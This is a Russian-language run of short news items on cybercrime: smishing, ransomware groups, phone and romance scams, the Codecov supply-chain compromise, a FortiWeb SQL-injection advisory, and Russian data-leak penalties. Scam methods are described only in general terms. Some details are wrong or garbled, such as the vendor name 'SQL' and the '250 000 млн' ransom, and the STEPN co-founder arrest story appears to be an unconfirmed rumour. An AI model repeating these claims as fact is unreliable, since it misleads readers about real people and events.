Кроме того, хакер убеждал клиентов банков установить поддельные Android- приложения под видом программ безопасности, которые, после установки, запрашивали разрешение на доступ к SMS для перехвата кодов двухфакторной аутентификации (2FA), отправляемых банком.
«Несмотря на использование относительно простых инструментов, Neo_Net достиг высокой степени успеха, адаптируя свою инфраструктуру под конкретные цели, что привело к краже более 350 тысяч евро с банковских счетов жертв и компрометации личных данных тысяч из них», — объяснил Тилль.
Neo_Net связывают с испаноговорящим злоумышленником, проживающим в Мексике. Он проявил себя как опытный киберпреступник, занимающийся продажей фишинговых панелей, похищенных данных жертв третьим лицам, а также предоставлением услуги Smishing-as-a-Service под названием Ankarex, предназначенной для атак на ряд стран по всему миру.
Платформа Ankarex активна с мая 2022 года. Она активно продвигается в Telegram-канале хакера, который на текущий момент имеет около 1700 подписчиков.
«Сам сервис доступен по адресу ankarex[.]net, и после регистрации пользователи могут пополнить свой баланс с помощью криптовалютных переводов и запускать свои собственные Smishing-кампании, указывая содержание SMS и номера телефонов целей», — рассказал специалист SentinelOne.
Примечательно, что новость о деятельности Neo_Net появилась как раз на фоне недавнего отчёта исследователей ThreatFabric о новой кампании трояна Anatsa (он же TeaBot), который с начала марта 2023 года атакует клиентов банков в США, Великобритании, Германии, Австрии и Швейцарии.
source: sentinelone.com/blog/neo_net-the-kingpin-of-spanish-ecrime
Хакерская группировка вымогателей из группы OldGremlin в 2022 году группа поставила рекорд по сумме требуемого выкупа. Если в 2021 году группа требовала у жертвы 250 000 млн рублей. за восстановление доступа к данным, то в 2022 году их ценник поднялся до 1 млрд рублей. Такую сумма группа потребовала от одной из российских компаний.
Об этом говорится в [отчете](https://www.group-ib.ru/resources/threat- research/oldgremlin.html?utm_source=press_release&utm_campaign=oldgremlin- report-ru&utm_medium=organic) Group-IB. На данный момент известно, что OldGremlin атакует исключительно российские цели.
Самым насыщенным для «гремлинов» оказался 2020 год — вымогатели отправили десять рассылок якобы от имени микрофинансовых организаций, металлургического холдинга, белорусского завода «МТЗ», а также медиахолдинга РБК. В 2021 году была проведена всего одна, но крайне успешная кампания от имени «Ассоциации интернет-торговли», в 2022 году — уже пять — якобы от сервисов «Консультант Плюс», «1С-Битрикс», платежной системы и другие.

Рассылки «гремлинов» четко нацелены на определенные отрасли. Среди их жертв —
банки, логистические, промышленные и страховые компании, а также ритейлеры,
девелоперы, компании, специализирующиеся на разработке программного
обеспечения. В 2020 году группа атаковала даже один из оружейных заводов
России.
По оценкам экспертов Group-IB, средняя сумма требуемого выкупа OldGremlin составляет около 100 млн рублей, а максимальная сумма требуемого выкупа — это рекорд по России в 2022 году — достигла 1 млрд руб.
Как сообщает журналист Колин Ву, вчера с официального комиссионного кошелька игры STEPN было выведено BSC и SOL на тридцать один миллион долларов. Часть из них перевели на FTX. В то же время сооснователя STEPN Джерри Хуанга задержали сотрудники полиции в Лондоне.
Его обвиняют по нескольким статьям, в частности в мошенничестве и в уклонении от уплаты налогов. Кроме этого, были конфискованы часть техники из главного офиса STEPN, который тоже находится в столице Англии. Напомним, что несколько дней назад приложение STEPN запретили власти США и КНР. Пока оно еще доступно в AppStore и Google Pay.
Приложение STEPN обещает пользователям награды за прогулки, если клиенты приобретут дорогие NFT в виде кроссовок. Чем больше пользователь двигается, тем больше наград он может получить. В одном из последних обновлений STEPN была добавлена поддержка сети BNB Chain. Что касается самого Джерри Хуанга, то ранее за ним не было замечено противоправных действий.
Он проработал в области маркетинга и видеоигр больше 10 лет. Кроме этого, он числится сооснователем другого стартапа Falafel Games. Эта компания занимается тем, что создает мобильные приложения. Компания Find Satoshi Lab, где работает Хуанг также не вызывала нареканий.
В конце апреля смарт-контракты STEPN были проверены, и специалисты Verilog нашли несколько проблем, которые имели отношение к рискам централизации, но указали на то, что приложение надежное.
STEPN разрабатывали с конца августа прошлого года, и смогло принести создателям в первом квартале более 26 миллионов долларов прибыли в виде комиссий NFT и роялти. В приложении вложили средства несколько подразделений Binance, а также Alameda.
Арест Джерри Хуанга скорее всего приведет к тому, что стоимость компании резко упадет, как и популярность приложения. Если обвинение будет доказано, тогда Хуангу придется провести за решеткой несколько лет как минимум. На данный момент STEPN (GMT) опустился на 17% за последние сутки. Это может быть как негативным влиянием этой новости, так и общим снижением рынка в последние сутки.

К сожалению, обвинения в неуплате налогов в криптовалютной сфере уже перестали быть редкостью. Желание регуляторов усилить контроль за этой областью связано, в том числе и тем, что через криптовалюты отмываются средства.
Житель Карелии обратился в дежурную часть ОМВД России по Костомукше с заявлением, что у него путем обмана похитили 1 020 000 рублей. Сначала мошенники звонили якобы от сотрудников банка, а затем позвонили и представились сотрудниками силового ведомства.
Пострадавшему мужчине сообщили, что на него незаконно оформили кредит, и для блокировки этой несанкционированной операции якобы требуется взять в банке такую же сумму, а затем перевести деньги на посторонний счет. Помимо средств, полученных при оформлении кредита, заявитель перечислил мошенникам 500 тысяч рублей из собственных накоплений.
Когда мужчина понял, что счет зарегистрирован вовсе не на его имя, деньги было уже не вернуть. Полицейские изъяли у пострадавшего 67 квитанций о переводах.
Подросток из Винницы решил заработать денег при помощи шантажа. С этой целью, он распечатал на домашнем принтере записки следующего содержания: «Переведите 600 гривен на EasyPay №… через терминал или Приват24, иначе мы пробьём вам колеса или разобьём стекла».
Поскольку сам молодой человек не очень разбирался в электронных платежах, он попросил своего приятеля помочь ему завести электронный кошелек и научить принимать деньги. И хотя он не объяснил, для чего ему нужно принимать платежи, это стало одной из будущих зацепок для правоохранителей.
Нарезав записки тонкими полосками, он выбрался во двор поздним вечером и стал подкладывать их под щетки стеклоочистителей автомобилей, которые стояли во дворе. Как позже признался подросток на суде, о том, что таким способом можно подзаработать, он узнал из новостей в интернете: якобы, данную схему вымогательства с успехом применяла в столице группа злоумышленников.
Утром следующего несколько соседей обнаружили на лобовых стеклах своих иномарок записки с угрозами. Однако, вместо того, чтобы побежать платить неизвестному шантажисту выкуп, они подали заявления в полицию.
Поиски злоумышленника не продолжались долго, однако результат расследования удивил всех. Подозреваемым оказался юноша из достаточно благополучной семьи, который учился в старших классах среднеобразовательной школы и большую часть своего свободного времени он проводил на курсах по подготовке к сдаче ЗНО.
Родители заверили, что молодой человек не испытывал недостатка в карманных деньгах, который мог бы подтолкнуть его на совершение подобного поступка. Тем не менее, во время обыска дома у подозреваемого, полицейские обнаружили у него предмет, напоминающий пистолет, который они изъяли вместе с другими вещдоками – обрезками распечатанных на принтере угроз и айфоном, на котором был установлен электронный кошелек EasyPay.
На суде подросток раскаялся в своем преступлении, хотя и заверил, что не планировал приводить угрозы в исполнение и портить чужое имущество. Однако собранных стороной обвинения доказательств хватило, чтобы осудить его по ст. 189 УК Украины (вымогательство) и назначить наказание в виде 3 лет лишения свободы, которое было заменено на 1 год испытательного срока.
Прокуратура Могилевской области направила в суд уголовное дело в отношении 29-летнего жителя Могилева. Ему инкриминированы несанкционированный доступ к компьютерной информации из корыстной заинтересованности и использование вредоносных программ. Об этом БЕЛТА сообщили в службе информации прокуратуры Могилевской области.
Согласно материалам дела, обвиняемый обнаружил и скопировал в сети интернет компьютерную программу, которая автоматически подбирает и проверяет реквизиты доступа к учетным записям, например, электронной почте. Далее без разрешения и согласия владельцев учетных записей он загружал в программу базы данных паролей и логинов почтовых ресурсов для проверки действующих аккаунтов, а полученную информацию впоследствии продавал пользователям специализированного форума. При этом обвиняемый осознавал, что использование такого ПО незаконно.
В ходе предварительного следствия установлены конкретные лица, компьютерная информация о паролях и логинах которых подверглась несанкционированному доступу.
Программа, которую использовал обвиняемый, предназначена для брута почтовых сервисов - несанкционированного доступа к компьютерным системам.
После изучения материалов дела в прокуратуре Могилевской области пришли к выводам об обоснованности обвинения и объективном исследовании обстоятельств преступлений, согласились с квалификацией содеянного по ч.1 ст.354 и ч.2 ст.349 Уголовного кодекса.
Уголовное дело находилось в производстве управления Следственного комитета по Могилевской области.
Ранее примененную к жителю Могилева меру пресечения в виде подписки о невыезде и надлежащем поведении прокурор оставил без изменения.
Пострадавшие компании, которые еще не успели заплатить выкуп, получат инструменты для дешифрования системы
Серверы вымогательской группировки Darkside, ответственной за атаку на американского топливного гиганта Colonial Pipeline, были отключены. С подпольных форумов также будут удалены связанные с группировкой темы. Киберпреступники потеряли доступ к публичной части своей инфраструктуры, в том числе к блогу, платежному серверу и CDN-серверам (Content Delivery Network). Об этом сообщил телеграмм- канал Russian OSINT
В настоящее время серверы недоступны по SSH-протоколу, а хостинг панели заблокированы. Денежные средства с платежного сервера киберпреступников и их клиентов были выведены на неизвестный адрес.
Кроме того, хакеры ввели новые ограничения на дальнейшие преступные действия. Они не будут атаковать социальный сектор (здравоохранение, образовательные учреждения) или государственные организации любой страны.
Пострадавшие компании, которые еще не успели заплатить выкуп, получат инструменты для дешифрования системы.
Американская прокуратура обвинила шестерых человек в сговоре с целью отмыть 3,5 миллиона долларов, полученных через фиктивные романтические знакомства. В прошлом году в США жертвы этого набирающего обороты прибыльного мошенничества потеряли сотни миллионов долларов.
По данным властей, аферисты под вымышленными именами орудовали на многих сайтах знакомств. Войдя в доверие, они злоупотребляли чувствами людей и вынуждали отправлять деньги на подконтрольные им банковские счета. Об этом говорится в официальной судебной жалобе, обнародованной на минувшей неделе прокурором Южного округа Нью-Йорка.
Сетевые «жиголо» использовали фиктивные имена Диего Франсиско, Ричард Франсиско и Том Франсиско и фото мужчин-моделей, чтобы завязывать знакомства. Они добивались расположения жертв своего обмана и начинали требовать денег.
Предлоги для «материальных просьб» были разные. Так, один из мошенников выдавал себя за архитектора из Дубая и утверждал, будто деньги ему нужны, чтобы получить платеж в миллион долларов. В других ситуациях он представлялся работником нефтедобывающей платформы, которому якобы требовались средства для ремонта.
У каждого члена этой группы аферистов была компания-пустышка с банковским счетом. Втеревшись в доверие к жертвам, мошенники убеждали их отправить деньги на счет банковским чеком или почтовым переводом.
Потом они быстро выводили средства со счетов — снимали наличные или совершали покупки. По подсчетам следователей, с 2018 по 2020 год на счета фирм, открытых членами группировки, поступило 4,5 миллиона долларов, причем более 3,5 миллиона — от жертв «романтических знакомств».
«Как можно утверждать, злоумышленники паразитировали на чувствах множества людей, с которыми завязывали фиктивные романтические знакомства, и в итоге обманули их на миллионы долларов. Благодаря Секретной службе США и следственному управлению Налоговой службы обвиняемым теперь назначены “свидания” в суде, где им предъявят федеральные обвинения», — не без иронии указала федеральный прокурор США Одри Страусс.
Как предупреждают власти, в США все больше случаев финансового мошенничества через романтические связи в Сети. Ранее в этом году живущий в штате Оклахома 28-летний нигериец признал вину в том, что помогал отмывать деньги действовавшей из Нигерии группировке «романтических вымогателей», которые обманом лишали пожилых американцев крупных сумм.
На этой афере злоумышленники, как считается, заработали больше 1,1 миллиона долларов.
В январе ФБР сообщило, что только за 2020 год зарегистрировало более 23 700 случаев мошенничества через романтические онлайн-знакомства, а совокупные потери от этих афер составили примерно 605 миллионов долларов.
• Source: justice[.]gov/usao-sdny/pr/6-defendants-charged-laundering-millions- dollars-proceeds-derived-romance-scams
Депутаты усилили наказания за злоупотребления при сборе и обработке
персональных данных. Если действия повлекли тяжкие последствия либо совершены
организованной группой, им грозит заключение до 10 лет
Фото: Михаил Гребенщиков / РБК
Госдума в трех чтениях приняла законопроект, который предусматривает наказание
в виде оборотных штрафов за серьезные утечки персональных данных,
карточка документа опубликована в
базе нижней палаты парламента.
Поправки вносят в статью об административных правонарушениях за нарушение требований о сборе персональных данных (13.11 КоАП). Закон вступит в силу с 1 марта 2025 года.
«В соответствии с законом, согласие на обработку персональных данных должно будет оформляться отдельно от других документов, в том числе клиентских договоров. Кроме того, предлагается запретить продавцу или владельцу агрегатора ограничивать доступ потребителя к информации в связи с отказом предоставить персональные данные за исключением случаев, когда такая обязанность предусмотрена законом», — сообщила пресс-служба Думы.
Уголовная ответственность вводится за создание сайта или страницы на нем, заведомо предназначенных для незаконных хранения, передачи (распространения, предоставления, доступа) информации, содержащей персональные данные, полученной незаконным путем. За это грозит лишение свободы до пяти лет.
Незаконные использование, передача, сбор и хранение персональных данных, полученных путем неправомерного доступа к средствам их обработки, хранения или иного вмешательства в их функционирование, грозят заключением до четырех лет. В случае если действия повлекли тяжкие последствия либо совершены организованной группой, то вводится наказание в виде заключения сроком на срок до десяти лет.
В пояснительной записке сказано, что сейчас компании, допустившие утечки персональных сведений клиентов, привлекаются к административной ответственности со штрафом до 100 тыс. руб., повторная утечка грозит штрафом до 300 тыс. руб., но «указанный размер штрафа не соразмерен с возможными последствиями от произошедших утечек». Поправки, считают авторы, дадут стимул операторам личной информации для вложения средств в развитие информационной безопасности и защиту персональных данных своих пользователей.
Крупные фирмы, занимающиеся кибербезопасностью, просили депутатов доработать проект, чтобы анализ утечек и объявлений о продаже личных данных оставался законным. По мнению представителей отрасли, законопроект «не предусматривает исключений для предприятий, преследующих легитимные цели защиты инфраструктуры от компьютерных атак». Если поправки не будут четко закреплять полномочия и ответственность компаний по информационной безопасности, то «часть услуг может выйти за пределы правового поля», предупреждал директор по работе с государственными структурами UserGate Сергей Петренко.
Россия возглавила рейтинг стран по количеству объявлений о продаже баз данных компаний в даркнете, на российские объявления пришлось примерно 10% от их общего количества за первое полугодие 2024 года, подсчитали летом аналитики Positive Technologies.
© https://www.rbc.ru/society/26/11/2024/6745af419a794763ef8e3488
Житель Николаева инфицировал сервера известной американской компании вирусом- майнером. В ходе международной полицейской операции правоохранители провели обыски и прекратили хакерскую деятельность.
Оперативники Департамента киберполиции и следователи Главного следственного управления Нацполиции под процессуальным руководством Офиса Генерального прокурора совместно с коллегами из Европола (учреждение правопорядка ЕС по противодействию международной организованной преступности) разоблачили 29-летнего хакера.
Начиная с 2021 года мужчина заражал сервера одной из крупнейших мировых компаний в сфере электронной коммерции. Сначала хакер «сломал» 1500 аккаунтов дочерней компании. Для этого злоумышленник применял собственноручно разработанное программное обеспечение автоматического подбора паролей – так называемый брутфорс.
Используя скомпрометированные аккаунты, хакер получил доступ к управлению сервисом. В дальнейшем фигурант создал компьютерный вирус-майнер для добычи криптовалюты, которым тайно инфицировал серверное оборудование компании. Для обеспечения работы вредоносного ПО хакер создал более одного миллиона виртуальных компьютеров.
Установлено, что за два года преступной деятельности мужчина вывел на подконтрольные электронные кошельки почти два миллиона долларов США в криптовалюте, что в эквиваленте составляет более 75 миллионов гривен.
При силовой поддержке спецподразделения ТОР правоохранители провели санкционированные обыски в помещениях фигуранта на территории Николаева.
Изъята компьютерная техника, банковские и сим-карты, электронные носители информации и другие доказательства противоправной деятельности.
На территории Нидерландов Европолом была создана специальная рабочая группа и VCP (Виртуальный командный пункт) для безотлагательного анализа информации, полученной в ходе проведения следственных действий на территории Украины. Европолом оказана помощь в блокировании электронных кошельков фигуранта с имеющимися на них активами.
Следователи Главного следственного управления Нацполиции открыли уголовное производство по ч. 5 ст. 361
Продолжаются следственные действия с целью установления возможных подельников фигуранта и его причастности к хакерским группировкам пророссийского характера. По результатам возможна дополнительная квалификация.
SpaceX объявила о запуске программы, в рамках которой финансово вознаградит людей, которым удастся взломать спутниковую сеть Starlink.
Компания SpaceX объявила, что все желающие могут взломать ее спутниковую сеть Starlink и она готова заплатить им до $25 000 долларов за обнаружение конкретных уязвимостей.
Сообщение появилось после того, как бельгийский исследователь Леннерт Воутерс заявил , что ему удалось успешно взломать абонентский терминал Starlink с помощью самодельной печатной платы, стоимостью $25.
Пресс-служба SpaceX заверила, что подвиг Воутерса не должен беспокоить пользователей Starlink: взлом напрямую не повлияет на спутники. В компании также отметили, что их собственные инженеры и белые хакеры всегда пытаются разными способами взломать Starlink, чтобы улучшить сервис и сделать его более безопасным.
Представитель SpaceX посоветовал другим специалистам помочь в решении проблемы и внести свой вклад в поиск багов.
source:
blackhat.com/us-22/briefings/schedule/index.html#glitched-on-earth-by-humans-
a-black-box-security-evaluation-of-the-spacex-starlink-user-terminal-26982
businessinsider.com/spacex-starlink-hacked-homemade-device-researcher-2022-8
api.starlink.com/public-
files/StarlinkWelcomesSecurityResearchersBringOnTheBugs.pdf
bugcrowd.com/spacex
bugcrowd.com/spacex/hall-of-fame
͏Тайваньский производитель MSI стал одной первый жертв новой группы вымогателей Money Message, которая затребовала у жертвы круглую сумму в размере 4 000 000 долларов.
Как известно, MSI является одним из лидеров в индустрии по производству электроники и компьютерных технологий с годовым доходом, превышающим 6,5 миллиардов долларов.
Хакеры на своем DLS заявляют и сопровождают пруфами, что им удалось выкрасть базы данных CTMS и ERP поставщика оборудования, а также исходный код ПО, фреймворк для разработки BIOS и закрытые ключи.
Через пять дней весь массив 1,5 ТБ данных из систем MSI будет слит, если жертва не перечислит выкуп.
Первые упоминания о связанных с новой ransowmare инцидентах появились 28 марта 2023 года на форуме bleepingcomputer[.]
После чего о ней уже сообщали исследователи ThreatLabz Zscaler.
На тот момент вымогатели только заявили о первых достижениях и сразу же выкатили выкуп в 1 млн. долларов, не называя жертву.
По данным исследователей, шифровальщик Money Message написан на C++, реализует ChaCha20/ECDH и включает в себя встроенный файл конфигурации JSON, определяющий способ шифрования, наименование добавляемого расширения, а также перечень не подлежащих шифрованию папок и служб, которые следует завершать.
После шифрования устройства ransomware создает записку с требованием выкупа под именем money_message.log, содержащую также ссылку на сайт переговоров в TOR и описание последствий невыполнения требований.
Пострадавший от взлома производитель пока никак не комментирует инцидент. Тем не менее переговоры жертвой ведутся.
Насколько серьезны намерения и угрозы Money Message и подтвердит ли MSI инцидент - будем посмотреть.
Следственным управлением УСК по городу Минску завершено расследование уголовного дела о хищении денежных средств путем использования компьютерной техники.
По данным следствия, с июля по сентябрь 2019 года двое 19-летних минчан в торговых центрах, кафе, а также иных объектах массового пребывания граждан на территории столицы знакомились с несовершеннолетними и малолетними и, под различными предлогами, просили воспользоваться их мобильными телефонами. В качестве предлогов выступали просьбы позвонить, восстановить работу сим-карты, воспользоваться интернетом, оценить работу различных сервисов и многие другие.
Получив доступ к смартфону и сим-карте, они с помощью специализированного приложения переводили денежные средства, полученные у оператора связи в качестве займа, на различные банковские карты или номера телефонов.
Часть потерпевших обращалась в милицию лишь спустя месяц, когда им на мобильные телефоны пришли смс-оповещения об оплате взятого ранее займа. Более 30 потерпевших были установлены следственным путем.
В результате проведенных оперативно-розыскных мероприятий сотрудниками милиции установлены и задержаны подозреваемые. В ходе допроса они пояснили следователям, что полученные незаконным способом денежные средства они тратили на продукты питания, развлечения и оплату арендного жилья.
Кроме этого, с целью увеличения преступного заработка обвиняемые вовлекли в совершение преступления несовершеннолетнего парня, обещая ему быстрое и легкое обогащение. Минчане подробно рассказали подростку преступною схему, благодаря которой им удалось совершить еще более 10 эпизодов противоправной деятельности. В отношении несовершеннолетнего уголовное преследование прекращено вследствие акта амнистии.
По завершению расследования установлено 132 эпизода преступной деятельности, а противоправным способом им удалось похитить свыше 12 тысяч рублей. В ходе следствия молодые люди признали вину и приняли меры к возмещению причиненного вреда.
Действия двух обвиняемых квалифицированы по ч. 3 ст. 212 (хищение путем использования компьютерной техники в крупном размере) и ч. 1 ст. 172 (вовлечение несовершеннолетнего в совершение преступления) Уголовного кодекса Республики Беларусь. К одному из них применена мера пресечения в виде подписки о невыезде и надлежащем поведении, ко второму - личное поручительство.
Уголовное дело передано прокурору для направления в суд.
Члены транснациональной группировки похищали конфиденциальные банковские данные иностранцев с более 300 популярных торговых интернет-площадок. Нанесенный ущерб составляет почти 800 тысяч евро. Полицейские провели обыск у владельца одного из криптокошельков, которые использовались для легализации средств.
Злоумышленники с использованием специального программного кода похищали платежные данные граждан ЕС с более 300 коммерческих площадок. Ущерб от противоправной деятельности составляет почти 800 тысяч евро, что в эквиваленте превышает 30 миллионов гривен.
Оперативники киберполиции Харьковщины совместно со следователями следственного управления ГУНП области установили местонахождение 45-летнего владельца криптокошелька, который, по информации правоохранителей Французской Республики, использовался для легализации доходов, полученных членами группировки.
Во исполнение международного запроса полицейские при процессуальном руководстве Офиса Генерального прокурора провели обыск у жителя областного центра. Изъяты компьютерная техника и мобильный телефон.
Французские правоохранители расследуют уголовное производство по фактам несанкционированного доступа и пребывания в автоматизированных системах обработки данных, несанкционированного ввода данных в автоматизированную систему обработки данных, несанкционированного вывода данных из автоматизированной системы обработки данных, несанкционированного сбора данных, имеющих личный характер, участие в сговоре (группировка преступников), кража в составе организованной преступной группы, которые предусмотрены рядом статей Уголовного кодекса Франции.
Сеть вещания работала 10 лет и приносила €3 млн. в год.
Полиция города Малага (Испания) арестовала 4 мужчин, которые управляли пиратской сетью потокового вещания, состоящей из 2600 каналов. Сеть незаконно обслуживала около 500 тыс. зрителей.
Мошенники использовали веб-сайты для рекламы 23 000 фильмов и сериалов через почти 100 «реселлеров» в Испании, Великобритании, Мальте, Португалии, Кипре и Греции. По данным полиции , арестованные зарабатывали €3 млн. в год, отмывая средства путем покупки недвижимости и переводя деньги на офшорные банковские счета.
Во время ареста полиция отключила 32 сервера во Франции, Нидерландах и Испании, что свидетельствует об общеевропейском масштабе операции, хотя ее штаб-квартира находилась в Испании.
Были заморожены 8 банковских счетов, а также конфискованы €2800 наличными и 2 автомобиля стоимостью €180 тыс., которые были приобретены на незаконно заработанные средства. Испанская полиция продолжает расследование и выявление остальных подозреваемых.
Согласно заявлению полиции, пиратская потоковая сеть работала с 2012 года, постоянно избегая обнаружения путем создания новых подставных компаний. Примечательно, что расследование этого дела о пиратстве контента началось в 2020 году после жалобы, поданной Альянсом творчества (ACE) – коалицией по защите интеллектуальной собственности.
source: policia.es/_es/comunicacion_prensa_detalle.php?ID=14482
Уязвимость в коде De-Fi-протокола привела к потере средств и приостановке работы компании.
Децентрализованный финансовый сервис (De-Fi) Team Finance 27 октября подтвердила, что хакеры воспользовались уязвимостью и украли криптовалюту на сумму $14,5 млн.
По словам Team Finance, токены были украдены с помощью функции миграции с версии 2 на версию 3. Компания временно приостановила всю свою деятельность до устранения уязвимости. Все средства, которые в настоящее время находятся в Team Finance, не подвергаются риску.
Team Finance позиционирует себя как «набор инструментов безопасности для создателей, которые хотят создать токен и привлечь деньги от сообщества инвесторов». По заявлениям платформы, с момента основания в 2020 году она получила криптовалюту на $3 млрд. в 12 различных блокчейнах.
Из-за роста негативной реакции на платформу в сети Team Finance написала в Twitter , что она «глубоко сожалеет» об этом инциденте. Также компания заявила, что проводит несколько аудитов каждого смарт-контракта. По словам некоторых компаний по безопасности блокчейна, уязвимость связана с проблемой в коде Team Finance.
source: twitter.com/TeamFinance_/status/1585573730541268992?ref_src=twsrc%5Etfw
Главным следственным управлением ГУ МВД России по Ставропольскому краю окончено расследование уголовного дела, возбужденного в отношении жителей одной из областей Уральского федерального округа по признакам преступления, предусмотренного пп. «а», «б» ч. 4 ст. 158, ч. 4 ст. 159, ч. 1 ст. 166 УК РФ.
Противоправные деяния обвиняемые совершили в составе организованной группы, где исполняли роли в звене «обнальщиков». Мошеннические действия пятерых злоумышленников пресечены сотрудниками Управления уголовного розыска краевого главка совместно с коллегами из полиции Москвы, Кисловодска и Челябинска.
Одна из участниц уже находится на скамье подсудимых. В отношении нее уголовное дело было выделено в отдельное производство. Рассмотрением занимается Кисловодский городской суд.
В рамках расследования установлено, что действовали злоумышленники по четко разработанному плану, каждый исполнял отведенную ему организатором группы роль.
Двое злоумышленников отвечали за поиск лиц, не осведомленных о противоправных деяниях, готовых на свое имя открыть счета. Третий участник противоправной деятельности обналичивал похищенные путем обмана денежные средства граждан и передавал их соучастнице, которая непосредственно держала связь с неустановленными «звонарями» и организатором группы.
Следствием четверым обвиняемым вменяется два эпизода противоправной деятельности. Им удалось обмануть 72-летнего пенсионера из Кисловодска и жительницу Екатеринбурга.
Потерпевшие лишились в общей сложности около двух миллионов восьмисот тысяч рублей.
В первом случае неустановленные следствием «звонари» в ходе телефонного разговора сообщили пожилому мужчине, что с его банковских счетов предпринята попытка списания денежных средств и для предотвращения мошеннических действий ему необходимо установить на мобильный телефон и ноутбук программы для удаленного доступа и сообщить поступившие в смс-сообщениях коды авторизации. Тем самым злоумышленники получили доступ в онлайн-кабинет пенсионера и смогли перевести с его карт крупные суммы денег.
Вторую потерпевшую обманули аналогичным способом. Только в этот раз злоумышленники убедили снять денежные средства и перевести их якобы на счета резервных ячеек.
После получения информации от «звонарей» о завершении махинаций «обнальщик» снимал в банкоматах денежные средства и передавал соучастнице, а она - организатору, который распределял незаконную прибыль между всеми, согласно исполнению отведенных ролей.
В рамках расследования также установлена причастность одного из участников группы – «обнальщика» - к трем угонам автомобилей.
В городе Копейске Челябинской области злоумышленник, находясь во дворах многоквартирных домов, вскрыл машины, путем замыкания электрических проводов запустил двигатели и угнал транспортные средства. По пути следования автомобили заглохли. Бросив их на обочине, обвиняемый скрылся.
Оперативниками краевого главка в ходе обысков по месту жительства четверых обвиняемых обнаружены и изъяты более 50 банковских карт, двенадцать мобильных телефонов, свыше 70 сим-карт, документы, компьютерная техника, блокноты с записями и другие вещественные доказательства.
На счета и недвижимое имущество одного из обвиняемых наложен арест в целях возмещения материального ущерба потерпевшим.
Следователем проведена компьютерная экспертиза и иные необходимые исследования, собрана достаточная доказательная база противоправной деятельности обвиняемых. Уголовное дело с утвержденным обвинительным заключением направлено в Кисловодский городской суд для рассмотрения по существу.
В Советском районном суде Тулы рассматривается уголовное дело по обвинению жителя города в краже у банка более чем 95 млн рублей, которая стала возможной из-за технической ошибки программного обеспечения. Фигурант совершил 220 операций по переводу денег, сообщает ТАСС со ссылкой на пресс-службу суда.
Фигуранту инкриминируются кража в особо крупном размере, а также легализация (отмывание) денежных средств, приобретенных в результате совершения преступления, в крупном и особо крупном размере. «Органами предварительного следствия Ю. обвиняется в том, что, с 21:24 31 мая 2020 года до 21:39 1 июня 2020 года, используя техническую ошибку в программном обеспечении при проведении банком ВТБ трансакций, он провел 220 операций по зачислению на банковскую карту, открытую на его имя в филиале банка, денежных средств, принадлежащих банку», — говорится в сообщении.
Таким способом подсудимый похитил у банка более 95,2 млн рублей. Затем он совершил сделки по приобретению недвижимости в собственность третьего лица и многочисленные финансовые операции с денежными средствами.
Сейчас подсудимый возместил имущественный вред банку частично — на сумму чуть меньше 40 млн рублей. В отношении него избрана мера пресечения в виде подписки о невыезде и надлежащем поведении.
Разработчики Codecov предупредили, что неизвестные злоумышленники сумели скомпрометирвоать платформу компании и добавить сборщик учетных данных к одному из инструментов. Компрометация коснулась продукта Bash Uploader, который позволяет клиентам Codecov передавать отчеты о покрытии кода для анализа.
Известно, что хакер получил доступ к скрипту Bash Uploader еще 31 января 2021 года и постепенно вносил в него изменения, добавляя вредоносный код, который перехватывал загрузки, обнаруживал и собирал любую конфиденциальную информацию, включая учетные данные, токены и ключи. Судя по всему, точкой входа для хакера стала ошибка, допущенная разработчиками в процессе создания образа Docker Codecov, которая позволила атакующему извлечь учетные данные, необходимые для внесения изменений в скрипт Bash Uploader.
Взлом был обнаружен 1 апреля 2021 года, и теперь разработчики, вместе со сторонними криминалистами занимаются расследованием инцидента. Компания сообщает, что уже уведомила о случившемся своих клиентов, в число которых входят такие гиганты, как Atlassian, P&G, GoDaddy, Washington Post, Tile, Dollar Shave Club и Webflow.
Ситуация усугубляет тем, что скрипт Bash Uploader встроен во многие другие продукты, в том числе actions-загрузчик Codecov для Github, Codecov CircleCl Orb, а также Codecov Bitrise Step.
Теперь клиентам Codecov, которые использовали любой из перечисленных инструментов, рекомендуется изменить все учетные данные, которые они передавали «по воздуху» на платформы Codecov за последние два с половиной месяца. Тем, кто использовал Bash Uploader локально, так же рекомендуется проверить свою версию на предмет вредоносных изменений и, если нужно, заменить ее "чистым" скриптом последней версии.
Источник: xakep.ru/2021/04/19/bash-uploader/
В Ленинский районный суд Екатеринбурга направлено уголовное дело в отношении уроженца Красноуфимска, обвиняемого в хищении средств с банковских карт. Об этом сообщает пресс-служба прокуратуры Свердловской области.
По версии следствия, обвиняемый являлся членом организованной преступной группы, основатель которой до настоящего времени не установлен.
«Злоумышленники, среди которых были и женщины, представляясь сотрудниками банков, вводили в заблуждение потерпевших, которые предоставляли им конфиденциальную информацию (о номере банковской карты, сроке действия, коде безопасности), а также цифровые пароли якобы для подтверждения факта отмены операций по безналичному переводу денег», — говорится в сообщении.
Далее члены ОПГ перечисляли деньги потерпевших на другие банковские карты, а также использовали похищенные средства для оплаты товара на сайтах магазина бытовой техники и ювелирных магазинах. В ряде случаев соучастники продавали приобретенный на деньги потерпевших товар. От действий злоумышленников пострадали граждане из Свердловской, Тульской, Кировской, Тверской, Тамбовской, Вологодской областей и Республики Марий Эл. Общий ущерб от действий ОПГ составил свыше 592 тыс. руб.
«В ходе допроса обвиняемый пояснил, что после реализации товара, приобретенного на средства потерпевших, оставлял 25-30% полученных денег себе, а на оставшиеся средства покупал криптовалюту в пользу организатора преступной группы (ему приходило сообщение с указанием крипто-кошелька, на который ему необходимо приобрести криптовалюту), таким образом передавая ему его долю от хищения чужих денежных средств», — отмечается в сообщении.
Уголовное дело было возбуждено по пункту «а» части 4 статьи 158 УК РФ «Кража, совершенная организованной группой, с причинением значительного ущерба гражданину, с банковского счета».
Компания SQLзакрыла четыре уязвимости в FortiWeb, выявленные экспертом компании Positive Technologies Андреем Медовым. В числе угроз — выполнение произвольного кода и перехват учетной записи администратора.
Первая уязвимость ([CVE-2020-29015](https://www.fortiguard.com/psirt/FG- IR-20-124), 6,4 по шкале CVSS v3.1) позволяет осуществить слепое внедрение SQL-кода (blind SQL injection) через пользовательский интерфейс FortiWeb. Неавторизованный злоумышленник может удаленно выполнять произвольные SQL- запросы, отправляя запрос с заголовком авторизации, содержащим вредоносный SQL-оператор. Для устранения проблемы нужно обновить FortiWeb 6.3.x и 6.2.x до версий 6.3.8 и 6.2.4 соответственно.
